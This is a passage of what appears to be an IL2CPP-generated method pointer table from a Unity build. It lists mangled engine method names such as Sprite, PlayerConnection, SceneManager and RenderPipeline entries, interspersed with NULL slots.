Sprite_Create_m1660F4117168DDEF2698FEAF80595DDBE0F9216D,
Sprite_GetTextureRect_Injected_mEF95C771BA50A780B71A632C71BBCD0F92B44A63,
Sprite_GetInnerUVs_Injected_mC34F24437EB70A80781267A638BD909D68A091EA,
Sprite_GetOuterUVs_Injected_m27113B4C012B99AF083390AD49203D329C15544A,
Sprite_GetPadding_Injected_m12B39280FA7B844ADFEAB0BA1355F654755A67E9,
Sprite_CreateSprite_Injected_m86EA7944DA6E1038A87D579F967315B6A70B28ED,
Sprite_get_bounds_Injected_m987E852C2009674973F2E254460636CF859F411A,
Sprite_get_rect_Injected_mF254371640E3209C35452CD7CFFD61A06AD4EA97,
Sprite_get_border_Injected_m9D59B69C43462D8DBB6186B858264F4E84C3E200,
Sprite_get_pivot_Injected_m084D8C724F7754DDFB1D7DDF2A5E48DB10C585B9,
APIUpdaterRuntimeHelpers_GetMovedFromAttributeDataForType_m98AD53EF42F7C84451FC756E268410A1579C858E,
APIUpdaterRuntimeHelpers_GetObsoleteTypeRedirection_m341664A1C3A5C4343FDC93CC54F3ED020FE3631C,
DataUtility_GetInnerUV_mE24A4A472C99B6BE28AB338537C8583D56F1A502,
DataUtility_GetOuterUV_m036E02F9E2726D1A2FD070C12A7ED3C1CF41F642,
DataUtility_GetPadding_mBCB6804FB0875EA1AC2FF55405AA6C1A2903E258,
DataUtility_GetMinSize_m12DA75277811A48FF075DFDDC8BEAFC2F23506FD,
SpriteAtlasManager_RequestAtlas_m2999088C9435693FBAE4FF101D28D889931C79EF,
SpriteAtlasManager_add_atlasRegistered_mF83F3AEB343B2111048330DCBBC25688B5F5F7AD,
SpriteAtlasManager_remove_atlasRegistered_m606C351B26C01824C922ACF29708D85F35072E9F,
SpriteAtlasManager_PostRegisteredAtlas_mC299319B185D829E9CD66CFAE5912E131F6A0335,
SpriteAtlasManager_Register_m907E9FEE5A7E9C41F406F4D18CBB998FE0F9B1FA,
SpriteAtlas_CanBindTo_mB4326EC04E7C2CC9D43AE04AEE9B91171F3BFA01,
DebugScreenCapture_set_rawImageDataReference_mB19FBA997F9FDDE05F33ECDF900F299DEFB7001D,
DebugScreenCapture_set_imageFormat_m375ECF2BFAC85011D5493B7DE5676B2EC3BA1DFB,
DebugScreenCapture_set_width_m1200EF0961699A652475F0590BE8D65A583F01A1,
DebugScreenCapture_set_height_m1798855FA1504E5092D6345264322E4D21B6C2A0,
MetaData__ctor_m97F5D6737326E4786030786484BFB87377E7E842,
MemoryProfiler_PrepareMetadata_m9E316562D70D6AC778FD4F0150C6B450BEE89550,
MemoryProfiler_WriteIntToByteArray_m012037DAD117E883EC6E4BF650FE4A6A6E9D1914,
MemoryProfiler_WriteStringToByteArray_m265DDB0BCF1426606F98400A31BD9EA8A4110048,
MemoryProfiler_FinalizeSnapshot_m4504D9112FFBC6E60933B5E28535775F8D31288F,
MemoryProfiler_SaveScreenshotToDisk_mB9688ED57BF5A2CBC8FF2D1A518725A99CDDC7C8,
MessageEventArgs__ctor_m66E6239501EEE8FCE1DA218E8189F46FB0669A45,
PlayerConnection_get_instance_m8F2B9C9F3AF41AC7A2FB617B5A700811E2444C14,
PlayerConnection_get_isConnected_mFDFB30D1AD4A7BFC66207092270E86B8D467209D,
PlayerConnection_CreateInstance_mA2B0AB3CCD81948E3F28463B458FDA68424D1DA0,
PlayerConnection_OnEnable_m3BE74152671ABA48E7AD707773B93F57BDA53002,
PlayerConnection_GetConnectionNativeApi_mDF3BB4FF695E3ED19E525951FEED123C52FB4781,
PlayerConnection_Register_m8760D786583FD5793A2FCE5EEB8DDA17C649CF86,
PlayerConnection_Unregister_m46303AD2C27A3A71B6569376E5C461AF1D0DFCE1,
PlayerConnection_RegisterConnection_mF9F575D16B80B1299D0E058E5F4A8DBAA907784F,
PlayerConnection_RegisterDisconnection_m2D2554B55821F11EB89442D54125A5C2984E0EC2,
PlayerConnection_UnregisterConnection_m0213376CEDCAAF5AF7C49226660C2F2182F2E1FD,
PlayerConnection_UnregisterDisconnection_mB2E0A093BA8F75B183A2774CA49FD5762B4E8A6E,
PlayerConnection_Send_mBFE41D75C28DF0885455CE809D40C489818F91B7,
PlayerConnection_TrySend_m6D589698ADF1E9A0E4CC208651F6CC86AD572423,
PlayerConnection_BlockUntilRecvMsg_mBDA2944F58B7984DDFA6A998CA558FC43B64896F,
PlayerConnection_DisconnectAll_mDC4057C27894D4216DF83A9EF9107C86AA3C5D03,
PlayerConnection_MessageCallbackInternal_m4157F80F90CF0626C5B82FB1598873F974F3B8A1,
PlayerConnection_ConnectedCallbackInternal_mD060297F076F310BDC42B468F076E054587C62FC,
PlayerConnection_DisconnectedCallback_m2079BD18D92A4B18246D143FF34BAEC70CEA2FA6,
PlayerConnection__ctor_m03E1218C1A0210FFDC4E2B2E2F79B7416E9D8F11,
U3CU3Ec__DisplayClass12_0__ctor_m07EBBD06394F8590D2B8DFD50B6D1EE94ABB0CBB,
U3CU3Ec__DisplayClass12_0_U3CRegisterU3Eb__0_mAC55D4E3203F06ED7F9872599F1CF02DF2430859,
U3CU3Ec__DisplayClass13_0__ctor_m6AA357ABA48CA75462E938084C7953E820CB18AA,
U3CU3Ec__DisplayClass13_0_U3CUnregisterU3Eb__0_m929D945DEF8430CA1E953420F9C28F43198F9FF5,
U3CU3Ec__DisplayClass20_0__ctor_m75B603A2B5F9AB50F7A52CCD844186FE1A6981AA,
U3CU3Ec__DisplayClass20_0_U3CBlockUntilRecvMsgU3Eb__0_mE65B4F1DEAC961650E79C59F69302B4AC63CE3F1,
PlayerEditorConnectionEvents_InvokeMessageIdSubscribers_m67F47A7AA6EC55A672AD1020F329C4332BEEFFAE,
PlayerEditorConnectionEvents_AddAndCreate_mB3B1355A8FDC43E5974CC3DE5BB17CB0C4328308,
PlayerEditorConnectionEvents_UnregisterManagedCallback_m61A82E77AA85A903BE0E534FEE601CABF9DE7809,
PlayerEditorConnectionEvents__ctor_mA1F7A1F05DA196CDC66A85361C5589F504C557B3,
MessageEvent__ctor_mD99E3A2C521C8B2B544F5DF2376258E9613D08EE,
ConnectionChangeEvent__ctor_mEEB8C3ABC40815A0BBC2EEEEAD77ACAE1A6A0554,
MessageTypeSubscribers_get_MessageTypeId_m782C2CCF400D0C5A0FB343FBE1B66C9C09971449,
MessageTypeSubscribers_set_MessageTypeId_m4FA721221C0D7812EA1AFB6C406C0620FF06761B,
MessageTypeSubscribers__ctor_mFC17A12701D7DB8739ABF17DB1D5EC41531CFED6,
U3CU3Ec__DisplayClass6_0__ctor_m2EE8CF87D7C3816A57E4D6238DEA0660DB2C7303,
U3CU3Ec__DisplayClass6_0_U3CInvokeMessageIdSubscribersU3Eb__0_mAB457C850FBAB1CF66C7EFAAE9F57EAD0FED6CFF,
U3CU3Ec__DisplayClass7_0__ctor_mC3BBDE08CDDEF0DA0811796906BA4A74C287CC2E,
U3CU3Ec__DisplayClass7_0_U3CAddAndCreateU3Eb__0_mD687F2BC0FE80692E5F88480DC5B861FE122F82E,
U3CU3Ec__DisplayClass8_0__ctor_mEFD5A284D56758F6EA5F97C12FDE739E7E1C2C93,
U3CU3Ec__DisplayClass8_0_U3CUnregisterManagedCallbackU3Eb__0_m3906587CC8F4CF5B752383CE6EA540B27E67055D,
Assert_Fail_m3519CAFE4134C1C51921E9D4789A42E51B911629,
Assert_IsTrue_m34B8FFDACB5799F12CBAA200C8AB844AF98B4DD0,
Assert_IsTrue_mF398159A7A5B43CE3054A41BD7B7D97AA8E9DDB4,
Assert_IsFalse_m5E4EA97BFC06F9EFBD3423534FBB342F589166D6,
NULL,
NULL,
NULL,
Assert_AreEqual_m04CFE6BB41B0A3F2125C791EC02DC881653BBDB4,
NULL,
NULL,
NULL,
Assert_AreNotEqual_mFDBFC2C4E9C32D6744A9BD8C206B73CCED6F4A75,
NULL,
NULL,
Assert_IsNull_m4F2DEF8EA495AE4102FD5801B7B2906F3EBB7954,
NULL,
NULL,
Assert_IsNotNull_m247BE2D851C5B85C2C4AE3C0A867F472F532E95A,
Assert_AreEqual_m90907707D9FCBCC3AC34896629322F2A64303CE8,
Assert__cctor_m4F5D4336EFAB36FEDD4144AA8DC31EE08D43A137,
AssertionException__ctor_m01CD9ADC1B0067C20CDC2A0697BBF3969E67FEB6,
AssertionException_get_Message_m4320D1607BDF97D451569837340C8E4A04461089,
AssertionMessageUtil_GetMessage_m06D253B5ABE9D86D2E003DD1FCD8E13C147CF861,
AssertionMessageUtil_GetMessage_m856DF8CA4776F4BDF11710487275D4570478A01A,
AssertionMessageUtil_GetEqualityMessage_m407D97A5CA58CA8457A02D7BF1699C83B566329E,
AssertionMessageUtil_NullFailureMessage_mAE978DCD05290E368DB8F6D5DD9D0D1A4676C488,
AssertionMessageUtil_BooleanFailureMessage_m48DE751CF4DED89919885F74602856E28777E069,
UnityEventTools_TidyAssemblyTypeName_mC14AF90F32E78652143E181365262D0B3D1487ED,
ArgumentCache_get_unityObjectArgument_mEA22BE8C25CDC789963C2DABF068E88147A66C69,
ArgumentCache_get_unityObjectArgumentAssemblyTypeName_m85640B88D8DA790019005A4ADD948E036ED79694,
ArgumentCache_get_intArgument_m7515338C0F3B5843E40CC48C303D2EFC02D9C19C,
ArgumentCache_get_floatArgument_mDED33C174CAD9DFAD58F9D6DF482557C0FC20D38,
ArgumentCache_get_stringArgument_m4CA65BC60FC1FDCE88779C009ED0E1DC4BED2D9A,
ArgumentCache_get_boolArgument_mB7A56994202FCB50BA04A6DBED9BAC45871F700A,
ArgumentCache_OnBeforeSerialize_mF01AF8DE34554D86AEC843FEB41D14F3172D481F,
ArgumentCache_OnAfterDeserialize_mD1C2E914447C2F69B43850F15AB19B62AF49DE96,
ArgumentCache__ctor_m8410B763CA027E30237E5954888A7F508800A331,
BaseInvokableCall__ctor_mD64C67D6FFB881F98555408743D7BB5CA7217B39,
BaseInvokableCall__ctor_m7633F06F55DFC3324C46A7C3DD6C55DC949FA0FE,
NULL,
NULL,
BaseInvokableCall_AllowInvoke_m1BF468FF253B7A087B32A66F5D27285D7DD39187,
NULL,
InvokableCall_add_Delegate_m5AD40C6D21D67A44980DF3B99946C4A2F17D9A10,
InvokableCall_remove_Delegate_mB8464CD88899199AAA70CD5EA4E02DCFB16045E1,
InvokableCall__ctor_mF3F94B432C977EE2DE7834EC2936E90D271C0464,
InvokableCall__ctor_m4FA1428E3A33219B2C8C5C571A705AC6B862FA70,
InvokableCall_Invoke_m874703DD260A64342495E79986B31EDA8D06C1F4,
InvokableCall_Invoke_m6F4828FD2B3E3BBB7AA6EECC2C37FB08538363F4,
InvokableCall_Find_mC76E5065AEEFC89956540199A4CB92E953E4B32F,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PersistentCall_get_target_mA12C3C9A21F6F5335761CB0EB3C7C965D8C393AE,
PersistentCall_get_targetAssemblyTypeName_m303DE56BDE5CD469D0210E1EA73F54B4C88228BE,
PersistentCall_get_methodName_mFD7F88289C9EF5DE6D7EFD3FEF1A5C640CBAF088,
PersistentCall_get_mode_m3FFA4D4FC3DA0C38106323CD33ABBFA53ED01928,
PersistentCall_get_arguments_mA3B29A1F4E7328523674ADC6FC0C7332BA053410,
PersistentCall_IsValid_mD63347854BC781710D4CC9B5FC3C3996E84A325D,
PersistentCall_GetRuntimeCall_m0DDE14D286D9995CCE65D2DFF27D57E4D476F072,
PersistentCall_GetObjectCall_m7474F59CE8CF8F473B55058DD432FB9652924FC8,
PersistentCall_OnBeforeSerialize_mD36FE363489E1A7C338AC7392F0DA13094825872,
PersistentCall_OnAfterDeserialize_m52A9B0536D334B3C89A0A9E4D923AA212201F485,
PersistentCall__ctor_m6EE5F241C45D97046ECAFCF45FB0DE96E7827142,
PersistentCallGroup__ctor_m1B17318026E3D419B2C194F66882E3BED6C4200A,
PersistentCallGroup_Initialize_m937649041F14D0D20F959B07BA099246EC32BCCB,
InvokableCallList_AddPersistentInvokableCall_mFB82EE201D90D84E0E25934EA879067BD666C0C1,
InvokableCallList_AddListener_m279B8BAED30DA27C305ADDF241F05CD2BC59625A,
InvokableCallList_RemoveListener_m5C78FE9ECE5990F29636216E879139D5863F36C8,
InvokableCallList_ClearPersistent_m9A776CBBC13667875F1765B32B469BC12AFD4192,
InvokableCallList_PrepareInvoke_m0CF5EBCDF4913AFC13CBE09F6CFB687D0F771301,
InvokableCallList__ctor_mE70F25915B775E7258A12670B76C7F7B3C36BF1A,
UnityEventBase__ctor_mB1F958EAC1A7C4B31253F2E1FED173A628725DEC,
UnityEventBase_UnityEngine_ISerializationCallbackReceiver_OnBeforeSerialize_mC47C72ED57A467E299925019E7DB9645D0F631F9,
UnityEventBase_UnityEngine_ISerializationCallbackReceiver_OnAfterDeserialize_m835BA25C9F342C93FB9DF774C0894A82C4F049CB,
NULL,
NULL,
UnityEventBase_FindMethod_m0B00339CC16B63CF1C50714D018A87948FC0B23B,
UnityEventBase_FindMethod_mE417FEA28EC49921FA28EBDAB1214B0E6EC7E91B,
UnityEventBase_DirtyPersistentCalls_m356D77B4849FC63501507E4D3F1054BD86D6B1CF,
UnityEventBase_RebuildPersistentCallsIfNeeded_m981B8A6658A88F620345D2C7F4ADCD0D788B0266,
UnityEventBase_AddCall_mA78C058ED530789A28F42347B653190FEC84DBBC,
UnityEventBase_RemoveListener_mFF8F8FAD5F18BA872C3CE005DC134B6828E1AD3B,
UnityEventBase_PrepareInvoke_m4D04FA5D7025C093047DCD3DFEEFB9DF48764FC2,
UnityEventBase_ToString_mE86F29D699C7537CACCAF3945F797EE659CE6522,
UnityEventBase_GetValidMethodInfo_m8507658F478F269090B0F2CBC9CA535B8A459FBA,
UnityAction__ctor_mC53E20D6B66E0D5688CD81B88DBB34F5A58B7131,
UnityAction_Invoke_m5CB9EE17CCDF64D00DE5D96DF3553CDB20D66F70,
UnityEvent__ctor_m03D3E5121B9A6100351984D0CE3050B909CD3235,
UnityEvent_AddListener_m8AA4287C16628486B41DA41CA5E7A856A706D302,
UnityEvent_RemoveListener_m0E138F5575CB4363019D3DA570E98FAD502B812C,
UnityEvent_FindMethod_Impl_m62E3D2795BACFF1BA2ED6A431ABD5FB2C7D3D681,
UnityEvent_GetDelegate_m6665C6282D3668BC57F2702FD0C3B108F4CFD226,
UnityEvent_GetDelegate_m4D67DA17E33F760CC6AAEDE11C7B896C7BD6DBEC,
UnityEvent_Invoke_mFBF80D59B03C30C5FE6A06F897D954ACADE061D2,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
FormerlySerializedAsAttribute__ctor_mD7361D52007EF623D139A726F892198E089F3C9D,
AlwaysLinkAssemblyAttribute__ctor_m4F7CEB8C9B82C4F3DB440C4D596BD8954B84D496,
PreserveAttribute__ctor_mF9E65066D9317F56C6F4AE274A1E2D55D6A62F96,
MovedFromAttributeData_Set_m155005FB8BCE0569C40B02D75FFADB3FBDB7EEDD,
MovedFromAttribute__ctor_m1B944ED92ED635A19DD4E82765BC0200C0BF3E4D,
MovedFromAttribute__ctor_mFDCCBD975A9BCC410529DB2B7C01659ACF8005CC,
Scene_GetPathInternal_m172956BAA9F3FF754E3F4506E9C7404B5E5741AD,
Scene_GetBuildIndexInternal_mE6E8F796728DEF0CCC34B5E45068F0C834089E28,
Scene_get_handle_mD508BE60333C6168610E12CECAB12E9B11C25E53,
Scene_get_path_mACD61B36E1F010A9FCA2C62637E0CB24B16729E4,
Scene_get_buildIndex_m82B6E0C96C85C952B7A2D794DB73CDA99AA9A57E,
Scene_GetHashCode_m74ACBFB8C656D5620A9A1E62D04E55ACBF63ADC9,
Scene_Equals_mB973481492F291BF8EAF1AD66B9F7FA3ACF3928D,
SceneManagerAPIInternal_GetNumScenesInBuildSettings_m76F90158FAE4EB4F6983D4023B33DEE8F5C0B1BF,
SceneManagerAPIInternal_GetSceneByBuildIndex_m73A59D056D005E9B07368895285E02B44DE07384,
SceneManagerAPIInternal_LoadSceneAsyncNameIndexInternal_m5FF3A8B53DD6A031DC52C167903AE4528391FE11,
SceneManagerAPIInternal_GetSceneByBuildIndex_Injected_mA2E9BE0F2098BA798B58CFB7C4FDE863B823556C,
SceneManagerAPIInternal_LoadSceneAsyncNameIndexInternal_Injected_mDEDFF3267DE3357E8F2D154053D25A2FBE2D2AFD,
SceneManagerAPI_get_ActiveAPI_m720FAACCF2718020292060003E7331B19AEB5FA8,
SceneManagerAPI_get_overrideAPI_mACC4192A2014665FF7D42EAAD41AA22A71AC040E,
SceneManagerAPI__ctor_m697F6B718DCE9B5E6CA4D58BBFB0CA275E003307,
SceneManagerAPI_GetNumScenesInBuildSettings_mDE94AA0B1EABBE1912ABAFEAD6B51B4A5A6C1135,
SceneManagerAPI_GetSceneByBuildIndex_m0F225EC4D98D2292C7B6F7EAAD205849CE292466,
SceneManagerAPI_LoadSceneAsyncByNameOrIndex_mF00A93D5BFEB82C6E11ECC77CC1534A34A6D13D4,
SceneManagerAPI_LoadFirstScene_mA4217ED8AD09C74E82DA9C10A0558AF830228E6F,
SceneManagerAPI__cctor_mE1B615097421660BFC1E125F86D5DDF3F6BA7C36,
SceneManager_get_sceneCount_mDB2658B632F95AB171E500C1519A681507B9230B,
SceneManager_get_sceneCountInBuildSettings_m7C49222A2A771B11C1CAD7D743BDDF8F8F39E685,
SceneManager_GetActiveScene_m2DB2A1ACB84805968A4B6396BFDFB92C0AF32BCE,
SceneManager_GetSceneByBuildIndex_m40D28B1DFB350909B150D66BA90C704E2A4AE548,
SceneManager_GetSceneAt_m5444433E1CD78FC2E573330630000B5A73E0FBF4,
SceneManager_LoadSceneAsyncNameIndexInternal_m32EDF87979243BB1343585D146461C329D065A5D,
SceneManager_LoadFirstScene_Internal_mB1BB5068ACF4A10B20923DC6081C7C8664BF9864,
SceneManager_add_sceneLoaded_mDE45940CCEC5D17EB92EB76DB8931E5483FBCD2C,
SceneManager_remove_sceneLoaded_m8840CC33052C4A09A52BF927C3738A7B66783155,
SceneManager_add_sceneUnloaded_mDFA2FD86D583E308417C3FF7753C92AAE11B99FA,
SceneManager_remove_sceneUnloaded_mAE3FCD9113413A6B067527A0D2B01525CC5D631A,
SceneManager_LoadScene_mE00D17D79AD74B307F913BBF296A36115548DB6D,
SceneManager_LoadScene_m0E137F74CF4CC01BBF43BE81BAA6CAD4DB7BDE96,
SceneManager_Internal_SceneLoaded_m52ABA92450E2B7A640C528A705E7322011A7E7CF,
SceneManager_Internal_SceneUnloaded_mAF39D5EE712D0079C20265D76D9366A0CA9A2703,
SceneManager_Internal_ActiveSceneChanged_m4BDBF7BD76501274A60D37D3EAB47002BA96A3D3,
SceneManager__cctor_mA9975EBD8A8F5463A87A1341C6366631E1CC9267,
SceneManager_GetActiveScene_Injected_m8E7E24846A3B781AEBB4D189E6EDE3533AE6BF1B,
SceneManager_GetSceneAt_Injected_mA38EDB6E1570DD59582AE345851F3BAB5E9D6AAF,
LoadSceneParameters__ctor_m40C160638049BF7577055B3460968F8B73459380,
PlayerLoopSystem_ToString_m259B8533D2C64C15D381B16F32C710A0018684A0,
UpdateFunction__ctor_m0D1D766F22D02176396DA6745A60EA046EE8227B,
UpdateFunction_Invoke_m9BCEE4E5BEE924EB804DA64314B78D0E831C179B,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
DefaultValueAttribute__ctor_mC1104F2F0A2CD67CE308CD7E5C1CCE74482C1BB4,
DefaultValueAttribute_get_Value_m8FC7A517D291CDDB7B5D17E811F5CB11FCF59D24,
DefaultValueAttribute_Equals_m6E5B33344C4FD2FC4775A657481B63F82F18B925,
DefaultValueAttribute_GetHashCode_m6F99553C7E76E711DCA6368417F66898F5AF6359,
ExcludeFromDocsAttribute__ctor_mF280A16634D72D09D550C2BA2294D9234D50C771,
CameraEventUtils_IsValid_m48FE26938285FFC26EE178ED871E28A80FB23ACB,
VertexAttributeDescriptor_get_attribute_m2F7C7084857741A39E9FF0D4BABF98F9C7018AAA,
VertexAttributeDescriptor_set_attribute_m526ED099EEA12DCB2FCB1BC88445FBF921E850A2,
VertexAttributeDescriptor_get_format_mF8EF98F3E047BC26D177C3A008BCDAF979E52C79,
VertexAttributeDescriptor_set_format_mCA82263EBD7802621D9ECE42D0F44D4AAECD46C5,
VertexAttributeDescriptor_get_dimension_mAB440DDFA08BF61D717547EC8B9C43C3DFC56FB8,
VertexAttributeDescriptor_set_dimension_mEF4325AE27221C732B214354A2DEB044ACFC69EE,
VertexAttributeDescriptor_get_stream_mAA4D41E2B4B9024161B176700100ADB27855E4FF,
VertexAttributeDescriptor_set_stream_m9A3991AA0365A1DCEDF80A61990F7B48913A1C0A,
VertexAttributeDescriptor__ctor_m713B31395FB13FDEB2665F5C4C31572D5875A43A,
VertexAttributeDescriptor_ToString_m45F7E7D6715E000C617173246F2C9BE23DF3FC8F,
VertexAttributeDescriptor_GetHashCode_mCB8C5F6AD422FE6A410C5406843FCE4B0ED5F2F8,
VertexAttributeDescriptor_Equals_m6FBFEE42E1BAAAC2D38434EDF0906C5B76D56BE5,
VertexAttributeDescriptor_Equals_mF328DE139864C201987238048AC79F8925CA435D,
RenderTargetIdentifier__ctor_mBB94C5581CCD259EC11AAFA68C151B35E5C72C4F,
RenderTargetIdentifier_op_Implicit_m4A8EE3AFC545170F3F2215D8DA0F2474B0015CC8,
RenderTargetIdentifier_ToString_mA0B5CBC27159C4257939A5CAC6CEACE65AA6D36A,
RenderTargetIdentifier_GetHashCode_m255E1EFD7BFC22B1B4464F9EF3346386DA328B86,
RenderTargetIdentifier_Equals_m859988BBC3D58D5C2AEA18C2CCCAF7009A5499D9,
RenderTargetIdentifier_Equals_m07E36F91E8966A0E3882EF168F1AE3656BE48E9A,
GraphicsSettings_get_lightsUseLinearIntensity_m56A1BD6409AAFD86D7DA0F47FB829CD631D65FCB,
GraphicsSettings_get_INTERNAL_currentRenderPipeline_mF43747DB6BEF3FA857B83CD21A543F94F33BDF82,
GraphicsSettings_get_currentRenderPipeline_m9B5CF917672DCFFD262CC8476FD968DFE910D32F,
OnDemandRendering_get_renderFrameInterval_mE5574585DE4A02C5A5C0F6770FF86AF1C4F3CCA9,
OnDemandRendering_GetRenderFrameInterval_mEE92E09F4366D8D3F2224AB0EBA6F1E57CD13F40,
OnDemandRendering__cctor_mBAE9AC06F698C374E748EF75B23B690656F88A47,
CommandBuffer_SetInvertCulling_m61EBB9DDA991720ECA8F4856BCC1899E38AA4C1F,
CommandBuffer_InitBuffer_mCD08DF1C752056E84B0DD3073C1D541D6B3ECDB5,
CommandBuffer_ReleaseBuffer_mF04481C3507E1D69582E220227AB0CA2481F963C,
CommandBuffer_set_name_mEC83B7FE28D6817A36A8B894A661D6D217488965,
CommandBuffer_Clear_m4E1272BD1A0C162C9C26434E115279F42FA557C7,
CommandBuffer_Blit_Texture_m8B439BC65FB89C00E4DCE10EF9B92D17C0F8B3D5,
CommandBuffer_ClearRenderTarget_mF79756BB41395A459CC5FD5CFFC517F65D93D86C,
CommandBuffer_ClearRenderTarget_mABBE498A16DCEADCAA8F5DB50073012F74D03F14,
CommandBuffer_ValidateAgainstExecutionFlags_mA5F027DDA6B0DCD8BC9AE296C3A6D8E1BD244FEF,
CommandBuffer_IssuePluginEventInternal_m6D7CD4E8BF37954CA0F317BC118A08362A0E3110,
CommandBuffer_Finalize_mF8A454E96E5349AA677FC73CDBECD30DD4F6464D,
CommandBuffer_Dispose_m9A5E7A3CA09B3E3F9D199FC7C9E7B27CD9CFADF3,
CommandBuffer_Dispose_mE75266209E71214415E356E9D4C8065C7395FB63,
CommandBuffer__ctor_m9445F1606331B732FCA393591F3E230714FD5FF4,
CommandBuffer_Blit_m067EA6B3B00F78DDF43887B565A3208164F84FC3,
CommandBuffer_IssuePluginEvent_mCA87F5D91890B22858471CD3EE0153E3FA1F1E8B,
CommandBuffer_Blit_Texture_Injected_m0EF8CBBAE32EE946114C6A5806849C8BBECA528A,
CommandBuffer_ClearRenderTarget_Injected_mCE53D6C8193FD6DBE95E276FBA3C230300E37AEF,
SphericalHarmonicsL2_get_Item_m4B9EF62E01AA7FD8A5DEB222618CDA17A7AE5901,
SphericalHarmonicsL2_GetHashCode_m6683A29826BFE74740D3CF28227E5C6FC8E6955E,
SphericalHarmonicsL2_Equals_m6B04A0E2E26885F766658AA1A2B0BD2499AA82C6,
SphericalHarmonicsL2_Equals_mA22783D26BEE236A8CA5425305D6772CEA6CCBC8,
SphericalHarmonicsL2_op_Equality_m489FDC880BE49535BCA1A9588BFB6825589498E1,
BatchCullingContext__ctor_m4E95A80E46EB29A21AB9AD64C2D1CC5891281449,
BatchRendererGroup_InvokeOnPerformCulling_m482BDBB3B02D5C2E66A37C1C4F76A1CB933864F8,
OnPerformCulling__ctor_mFB91FB8D6D713AC39AFB921AF1C23A50EC80529B,
OnPerformCulling_Invoke_mCD3C3FF1DC98173ADA46A711673C69ECAE494F22,
LODParameters_Equals_mAD45601A9E881620B23A7922D8AA5AFBC91E0B9F,
LODParameters_Equals_mF956A067D82497A00AC8234322CD848E6FB7BADE,
LODParameters_GetHashCode_mECFCEAAAC935759A99C30C69BBC99A1148F46F40,
NULL,
RenderPipeline_ProcessRenderRequests_m1303438384D0A5857A147C280A1AF0E16E488908,
RenderPipeline_Render_m41E15C2221365D92636651792FBDAD1A04E8AF1A,
RenderPipeline_InternalRender_mCB77395158F4572F348D8227BA9127ABF1C9C5BE,
RenderPipeline_InternalRenderWithRequests_mA4E809CF43979778D7F5048F79BF506746E82B57,
RenderPipeline_get_disposed_mF0D4B88DF44249E0FC2371697B913DD5A81B3850,
RenderPipeline_set_disposed_mB7EC4BD04C80015CBCC0B92A65A6DE615F2828A8,
RenderPipeline_Dispose_mDF8A62A6B7D3A00128C9341921C036D015C41179,
RenderPipeline_Dispose_m581E2B33EF0CCAF2C3E7BD71AE32B4974D259286,
RenderPipelineAsset_InternalCreatePipeline_m662E6A3D3B14C19D5318E172A4AF81FEF71C6252,
RenderPipelineAsset_get_renderingLayerMaskNames_mC0978F38B2EADD1462593AC6D8395E612CB1329D,
RenderPipelineAsset_get_prefixedRenderingLayerMaskNames_m89254E02D74CC6FC9320104B8A1748534FE55F6B,
RenderPipelineAsset_get_defaultMaterial_mCF112570E7B47208A0B700BA97B33CAE6713D323,
RenderPipelineAsset_get_autodeskInteractiveShader_m261A0788B4F73AFC5A50953878552BC3BFF8B674,
RenderPipelineAsset_get_autodeskInteractiveTransparentShader_m6E2A2439FCB378F64DC46CB6DB517A1661A306F8,
RenderPipelineAsset_get_autodeskInteractiveMaskedShader_m42DB9A70B290E217B91616E9274C9B7E58D54362,
RenderPipelineAsset_get_terrainDetailLitShader_m74F2FA112CD18493E7003F6F711AA09A8C930136,
RenderPipelineAsset_get_terrainDetailGrassShader_mBE126045BF9048B59CE56D1BD9C69C3DEB4CDD96,
RenderPipelineAsset_get_terrainDetailGrassBillboardShader_mE233539926B92ADB7A057C34CBCD7E51823C75A2,
RenderPipelineAsset_get_defaultParticleMaterial_mC68CA6787815E00CF501F268F34DA0B3C83B3013,
RenderPipelineAsset_get_defaultLineMaterial_mB4DD122B043417F3810FEAAA74E79B369A26B484,
RenderPipelineAsset_get_defaultTerrainMaterial_m129D75CFE9689112452AA911C24BEE4939ADB520,
RenderPipelineAsset_get_defaultUIMaterial_mBB9F6694EEEB97AC6140C094A48743660A0DAF04,
RenderPipelineAsset_get_defaultUIOverdrawMaterial_m19832E76629C0AFC18F0D61C5C1CC47533200038,
RenderPipelineAsset_get_defaultUIETC1SupportedMaterial_m2D1DC4B89F59283C8AE3101F3DC05D88C10D4C10,
RenderPipelineAsset_get_default2DMaterial_m2418C7E1A0974B2A06CF3BE81590C7B0DF1DB113,
RenderPipelineAsset_get_default2DMaskMaterial_mEE67105F80768BDFD1C93E8709FEBF2D4561E14E,
RenderPipelineAsset_get_defaultShader_m633AD6A97B2D1D436E42920D766B1283C1FED858,
RenderPipelineAsset_get_defaultSpeedTree7Shader_mCEF3795C9E36F0A9D9A3CE29824790B172637252,
RenderPipelineAsset_get_defaultSpeedTree8Shader_mAEB3D02FC0A0016BAC5C22BC1967827403E5C17A,
NULL,
RenderPipelineAsset_OnValidate_mD160C7BDEA559BAF3DDA48B4819307E07B377F52,
RenderPipelineAsset_OnDisable_mE99CEED707BDC901AD37DC976FA3A3A313E7E00C,
RenderPipelineAsset__ctor_mC45BECAED54BEDC4555AF010323EABF49BA7B78A,
RenderPipelineManager_get_currentPipeline_m1907912AEAFDF9E549FCE397178EFE93D4691760,
RenderPipelineManager_set_currentPipeline_m58F8CDDA2C8A138F355F7672BE5382C62D2C55DF,
RenderPipelineManager_OnActiveRenderPipelineTypeChanged_mC5AC4C431D84C5F030CA2DF6B46C19EFA87E92EA,
RenderPipelineManager_HandleRenderPipelineChange_m89D456720172AE19FEABD43C870EE06BA6FFE885,
RenderPipelineManager_CleanupRenderPipeline_m6FF252A0C2CFDEDFB4A5B5EF33B86B5EDFBAFD2E,
RenderPipelineManager_GetCurrentPipelineAssetType_mD70AE9CC75AF741F336A494688F69B9AC666123C,
RenderPipelineManager_DoRenderLoop_Internal_m7FB9F81FF54E716454A4888990CE46220DBAD6CC,
RenderPipelineManager_PrepareRenderPipeline_m399F65B962C902B1FFC331294E3CA4C469BDC063,
RenderPipelineManager__cctor_mE2CB9B1D60D04CAEEBC0130E5B99644870F90BF4,
